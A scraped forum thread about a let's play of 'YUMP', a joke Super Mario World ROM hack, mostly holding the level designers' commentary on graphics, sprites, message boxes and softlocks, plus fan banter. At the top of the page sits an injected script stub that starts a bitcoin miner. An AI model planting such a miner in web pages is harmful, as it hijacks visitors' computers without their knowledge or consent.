<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectsmbx communitysmw central

YUMP - Yeah! UTrue MTalkhaus Production

this is the place where lps are being talked about. it's important to talk about games being played on the internet.

User avatar
QubicTom
Pleasantly Confused
Posts: 803
Joined: 4 years ago
First name: Tom
Location: The North

Re: YUMP - Youtube'd Up Mario Party

Postby QubicTom » 2 years ago

I'm really looking forward to this! Can't wait to see your reactions to some of the, uh, 'levels' in this game. I think someone should crosspost the dev commentary from my thread, but the poster should not be the actual level author, just to keep those secret for now :)

User avatar
xfix
:)
Posts: 751
Joined: 10 years ago
First name: Konrad Borowski

Re: YUMP - Youtube'd Up Mario Party

Postby xfix » 2 years ago

About this side-exit resetting a midpoint thing, this was actually used in VIP3 as a trap. It is fairly obscure of a game mechanic however, which is why there is a secret hint about that.

User avatar
raocow
the death of the incredible huge
Posts: 2947
Joined: 10 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: YUMP - Youtube'd Up Mario Party

Postby raocow » 2 years ago

oh geez you got the actual emote
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

User avatar
Lazy_
rudine
Posts: 170
Joined: 4 years ago
Pronouns: he/him/his
Location: switzerland

Re: YUMP - Youtube'd Up Mario Party

Postby Lazy_ » 2 years ago

hi I led this collab. I'm gonna be crossposting all the dev commentary from qubictom's thread cuz I think a lot of it is pretty interesting. I will omit all mentions of names because I want raocow to go through this blind until he unlocks the in-game author list.

Grassy Plains 1
This level began it all. It technically wasn't made for this project: it's actually the author's first SMW level, made back in 2010. After they posted it in the discord, many other people showed their first levels, and that's actually how this collab was started.

The mushroom hill background from YI1 is somewhat special as it has its own palette that it was meant to be used with. There are other backgrounds like that, like the underwater background or the cave background. In this case, the mushroom hill background uses two palettes to save tiles. Essentially, the same tile is used for a dark blue hill overlapping a dark blue hill as for a dark blue hill overlapping a light blue hill, but they use different palettes. This works when using the usual blue palette, but the other palettes weren't designed for that, which is why this level has that graphical glitch at the overlapping part.

This level is more or less Yoshi's Island 1, same enemies, background, slope at beginning just like YI1. I think it's based off of it, but it doesn't really look similar.

The name is pretty much just the most boring possible name we could come up with. It fits the very bland and safe nature of this level. There are multiple continuations of Grassy Plains later on in the game, none of which are Grassy Plains 2.
YOSHI'S ISLAND 2
While many first levels were added in this project, this one wasn't really one of them. It was made and added late in the project's development. The author felt that the project lacked a blatant Yoshi's Island 2 level edit, so they decided to add one. It's essentially just that, Yoshi's Island 2 modified by someone who was learning how to use Lunar Magic. Unfortunately, the author lost their first ROM hack, but they tried to make it feel like their first ROM hack. They experimented with a lot of elements that were unused in Super Mario World.

This level actually doesn't actually use level slot 106, as that was taken by Possibly Kaizo. However, to preserve accuracy, the original message boxes and unmodified bonus room were brought in from the original Super Mario World. There are other blatant level edits in YUMP, but they aren't called directly by their SMW level name, unlike this one.

Nets sorta look weird because inserting nets correctly is sorta tricky actually and it takes lots of experimenting to place nets right. While the author does know how to place nets now, it took them a while to realize, which is why they were intentionally placed wrong here. It's weird that net graphics are loaded in every level, considering they were only used in castles in original game. The same goes for bushes and berries, which are also loaded in every level for some reason, even though they're only used in grassland levels.

Flying red coins are flammable. Their placement in this level works out pretty well, even if that wasn't intentional. The player will likely start the level by holding X or Y and will accidentally burn the coins. Considering Grassy Plains 1 provides a flower and that level isn't all that hard, chances are the player will have a flower.

Lots of 1UPs were placed, as the author sorta wanted this stage to be a lifefarm, as they were worried people would Game Over in the Cirno stage. Considering that the first world pretty much showers the player in 1UPs, it doesn't sound like a legitimate concern anymore, but it was a concern back when they were designing this stage.

Lava doesn't work as sprite interaction with water/lava was disabled. For some reason Super Mario World levels have to explicitly specify whether sprites other than Mario can interact with those.

The author maliciously left the spinjump message box in this level. They were hoping somebody would die actually following the instructions about how to spinjump when the floor was turn blocks. Ah well.

A feather was placed before Midway Point as continuining in Yoshi's Island 2 is rather painful, considering the muncher sequence just after Midway Point. World 1 wasn't supposed to be frustrating, so they decided to put a feather to make things less so. For a similar reason there is a feather at beginning - the author felt that the level was too frustrating, so they just put a cape to make it easier. This also provides a nice place to take feathers from to break other levels.

Sometimes the music restarts because the author put a directional coin. Normally those are placed in prize blocks, and the prize block is responsible for starting the P-switch music. However, because it was put directly in the level, the P-switch music didn't start. When it hits a wall or runs out of coins, it assumes the P-Switch music was playing, which causes the music to be reset even though it was already playing.

The level is sorta spammy with sprites. One explanation for this is that the hypothetical first-time hacker wanted to make his level hard, so he placed sprites without thinking. This will be an unfortunate theme with the author's future levels. They apologize for this in advance
WORLD WAR 3
This level is a recreation of a level that the author made in 2007.

It used to be later on in the game. The reason for that was that the name of this level may suggest it's a hard level, but... it really isn't. It was moved to World 1 to sort of have a numerical order going on - Grassy Plains 1, YOSHI'S ISLAND 2, WORLD WAR 3. It uses a fortress tile to make it sound more scary and also to have a general save point.
cirno's perfect math class
The name is, of course, a reference to the famous IOSYS video. Somebody even made a SMW port of it. Unfortunately, https://youtu.be/Fzny4rJrTZw?t=640 is the only video of that port we could find, and it's a showcase of Hurry Up glitch in Super Mario World.

The level gimmick is that because Cirno is stupid, you have to select the wrong answers, and something happens in the level to make the answer you picked right. In one mathematical question, there are two identical choices (one Urchin), however one reveals to be actually two - this is a reference to Morsel's VLDC8 entry.

The sudden warping is caused by a sprite that exists in Super Mario World that does exactly that. There is a four tile high invisible sprite in Super Mario World that causes player to move to its right side when touched. It was used in Yoshi's Island 1 for... no reason whatsover. It's placed near the diagonal pipe shooter, but removing it doesn't change Mario's flight path in any way. The diagonal pipe in Yoshi's Island 1 is the only one using that sprite, no other diagonal pipe uses it. For all intents and purposes, it's a pointless unused sprite.
How you say broke in Spanish
If Google Translate is to be believed, the answer is "rompió". So essentially this level is a romp. Also a kanye west reference

This is a quick janky level made early on in YUMP development. There are lots of cement buildings so it sorta looks like a city level. There is a lifefarm using one of vines in this level, but it's sorta slow, and there are better lifefarms in this game - but it will have to do until you reach the next lifefarm.

The goal point looks a bit weird. Goal points could've had bottom parts just like Midway Points, but that was never used in the actual game, and at some point in game's development, the goal bottom graphics were replaced with bush graphics. The code responsible for rendering the goal's bottom still exists however.
misc:
- "yump" is also a synonym for p-switch jump, specifically off of switch palace switches
- intro text is taken from here, slightly edited to fit the scenario. JUMPers is a term coined by the same user
- message box in yoshi's house is a t-dub quote

also want to mention that this is a joke hack so if you enjoy getting mad at video games, try not to. we told rao to use savestates as he sees fit because we don't want to ruin his or anyone else's mood by making him suffer through objectively bad levels. not saying all of the game is bad, but some levels definitely are and I think instead of pointlessly complaining about it we should just enjoy the ridiculousness of it. thank you and have a nice day
is there an integer overflow when you become 256 years old

User avatar
Lockirby2
Posts: 351
Joined: 4 years ago
Location: Ontario, Canada
Contact:

Re: YUMP - Youtube'd Up Mario Party

Postby Lockirby2 » 2 years ago

This channel has basically just become a QubicTom ripoff at this point. Kappa

Gotta love the nonsense that is YUMP.

User avatar
CanUBe
Posts: 8
Joined: 2 years ago
Pronouns: he/him/his

Re: YUMP - Youtube'd Up Mario Party

Postby CanUBe » 2 years ago

♪ how you say broke in spanish?? me no hablo
me drown sorrow in that diablo
me found bravery in my bravado ♪
so i have the means to do a secret message thing here but i don't know what to write. how about... uh. im stuck

User avatar
Grounder
Posts: 3300
Joined: 5 years ago

Re: YUMP - Youtube'd Up Mario Party

Postby Grounder » 2 years ago

this is a suuuuuuuuuuper early warning, but the blue switch level has a place where you can softlock the game

savestate before going in just in case
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

User avatar
raocow
the death of the incredible huge
Posts: 2947
Joined: 10 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: YUMP - Youtube'd Up Mario Party

Postby raocow » 2 years ago

so after the second recording session, I honestly wouldn't consider this game 'bad'. Well I mean you know what I mean. This is like not super trainwreck town, it's more like... Vip1.

You know what, yeah. This feels like Vip1 !
American Vip1, that came after the american vip4 of JUMP.
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

User avatar
xfix
:)
Posts: 751
Joined: 10 years ago
First name: Konrad Borowski

Re: YUMP - Youtube'd Up Mario Party

Postby xfix » 2 years ago

Back when during development, Lazy described YUMP like this on Discord.
it's basically a more extreme vip
that turns into kaizo towards the end
but i mean, isn't that the case for VIP 1 too? about it turning somewhat kaizo

User avatar
raocow
the death of the incredible huge
Posts: 2947
Joined: 10 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: YUMP - Youtube'd Up Mario Party

Postby raocow » 2 years ago

yup, endgame and tiny postgame of vip1 is ludicrous
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

User avatar
cozyduck
Posts: 204
Joined: 10 years ago
Location: Switzerland

Re: YUMP - Youtube'd Up Mario Party

Postby cozyduck » 2 years ago

raocow wrote: so after the second recording session, I honestly wouldn't consider this game 'bad'. Well I mean you know what I mean. This is like not super trainwreck town, it's more like... Vip1.

While some levels in this are truly amazing, there are definitely a few genuinely bad levels as well, and even though what makes them bad might be funny, it doesn't change the fact that actually playing them is unpleasant. Sometimes the bad levels are quite hard too, which is probably going to frustrate you a bit, and some of your viewers even more so. At the very least it should be entertaining throughout the whole journey though.

User avatar
morsel/morceau
Posts: 373
Joined: 10 years ago
Location: exotic horse island

Re: YUMP - Youtube'd Up Mario Party

Postby morsel/morceau » 2 years ago

raocow wrote: so after the second recording session, I honestly wouldn't consider this game 'bad'. Well I mean you know what I mean. This is like not super trainwreck town, it's more like... Vip1.

You know what, yeah. This feels like Vip1 !
American Vip1, that came after the american vip4 of JUMP.
I think all of us who contributed to this had different conceptions of what a 'YouTube level' is. Garbage levels, joke levels, levels made in 20 minutes, kaizo levels, levels that try to make ProtonJon swear: they are all here, nestling more or less uncomfortably side by side. And I, the Irishman, the German, the Frenchman, the Swiss, GlitchMr who may or may not be Polish and the gentleman from Korea are all undoubtedly proud this day to stand up true Americans. This is our Independence Day and history began in 1776.
dont wanna jihad no more

User avatar
raocow
the death of the incredible huge
Posts: 2947
Joined: 10 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: YUMP - Youtube'd Up Mario Party

Postby raocow » 2 years ago

I meant to say western vip but american indoctrination is strong on the internet

unrelated, but I'm surprised by how many people I recognise from all the countries you mentioned.
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

User avatar
Sturg
Gets his freak on with VGM
Posts: 670
Joined: 8 years ago
First name: sturgyman
Location: - :noiƚɒɔo⅃
Contact:

Re: YUMP - Youtube'd Up Mario Party

Postby Sturg » 2 years ago

please start over and do a dragon coin run ok thank you bye
ImageImage
ImageImageImageImage

gbreeze
Posts: 79
Joined: 3 years ago

Re: YUMP - Youtube'd Up Mario Party

Postby gbreeze » 2 years ago

Don't forget capitalist America where they measure things in feet instead of meters

User avatar
Diggertron
Posts: 35
Joined: 6 years ago
Location: The United Kingdom of Great Britain and Northern Ireland

Re: YUMP - Youtube'd Up Mario Party

Postby Diggertron » 2 years ago

Wow that kind of level design made me really nostalgic for the Olden Days™
That makes raocow a victim of proprietary software.
Skynet.

User avatar
Alice
Posts: 2194
Joined: 8 years ago
Pronouns: Girl person
Location: Wonderland

Re: YUMP - Youtube'd Up Mario Party

Postby Alice » 2 years ago

raocow wrote: I meant to say western vip but american indoctrination is strong on the internet
Everyone is American anyways.

User avatar
xfix
:)
Posts: 751
Joined: 10 years ago
First name: Konrad Borowski

Re: YUMP - Youtube'd Up Mario Party

Postby xfix » 2 years ago

morsel/morceau wrote:GlitchMr who may or may not be Polish
I'm. Ignore my profile location.
Sturg wrote: please start over and do a dragon coin run ok thank you bye
This game isn't really designed for dragon coin runs, it pretty much ignored that "5 dragon coins" thing, often levels either have less than that or more than that.

User avatar
FrozenQuills
undefinable flair 2019
Posts: 781
Joined: 4 years ago
Location: my skull

Re: YUMP - Youtube'd Up Mario Party

Postby FrozenQuills » 2 years ago

raocow is going to have A Time in this magnificent hack
Image
Image
Image
SMBX Tileset Compiler and Separator
The boss entry that made me eat a shoe.
Image

5th place counter: 5
(SMBX Forums CC11, SMBX Forums CC12, Endgame Madness Contest, SMWC Kaizo Contest 2016, SMWC 24hr Contest 2018)

User avatar
Sebby19
Posts: 2564
Joined: 10 years ago
Location: Winnipeg, Manitoba

Re: YUMP - Youtube'd Up Mario Party

Postby Sebby19 » 2 years ago

Wario Land 3 is next after this, right?
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official raocow subscriber # 30,000

User avatar
Sturg
Gets his freak on with VGM
Posts: 670
Joined: 8 years ago
First name: sturgyman
Location: - :noiƚɒɔo⅃
Contact:

Re: YUMP - Youtube'd Up Mario Party

Postby Sturg » 2 years ago

GlitchMr wrote: This game isn't really designed for dragon coin runs, it pretty much ignored that "5 dragon coins" thing, often levels either have less than that or more than that.
I mean it has dragon coins in it so I say it's good to go
ImageImage
ImageImageImageImage

User avatar
ft029
m/m wannabe
Posts: 472
Joined: 3 years ago
Location: U.S.

Re: YUMP - Youtube'd Up Mario Party

Postby ft029 » 2 years ago

Grounder wrote: this is a suuuuuuuuuuper early warning, but the blue switch level has a place where you can softlock the game

savestate before going in just in case
In fact, new softlocks (and game crashes) in levels are being discovered every other day. Just make sure to visit save prompts often (World War 3 is one), or if you prefer cheating, use savestates.
Mosts Awards:
Image
Image

AlchemistHohenheim
Posts: 302
Joined: 10 years ago

Re: YUMP - Youtube'd Up Mario Party

Postby AlchemistHohenheim » 2 years ago

I can already tell that this is going to be...an experience.

Also, not looking forward to the video that manages to earn SwiftRage as its title.
So this thread is a thing. Maybe check it out.

User avatar
ano0maly
Discord User
Posts: 1831
Joined: 8 years ago

Re: YUMP - Youtube'd Up Mario Party

Postby ano0maly » 2 years ago

Huh so this hack was accepted in SMWC despite the kaizo designs and other issues? Maybe they just accepted that it was intentionally made like this?

I don't get the point of the P-switch at the end of Grassy Plains 1. It's not like it helped you get the goal tape, and it's a yellow level so it wasn't for a secret exit. Even Lazy_'s commentary didn't address it.
gbreeze wrote: Don't forget capitalist America where they measure things in feet instead of meters
That was inherited from Britain though
Image The talkhaus Discord server. Come ask for an invite to join!

Image

Image
Now the sole biggest


Return to “let's play”

Who is online

Users browsing this forum: No registered users and 14 guests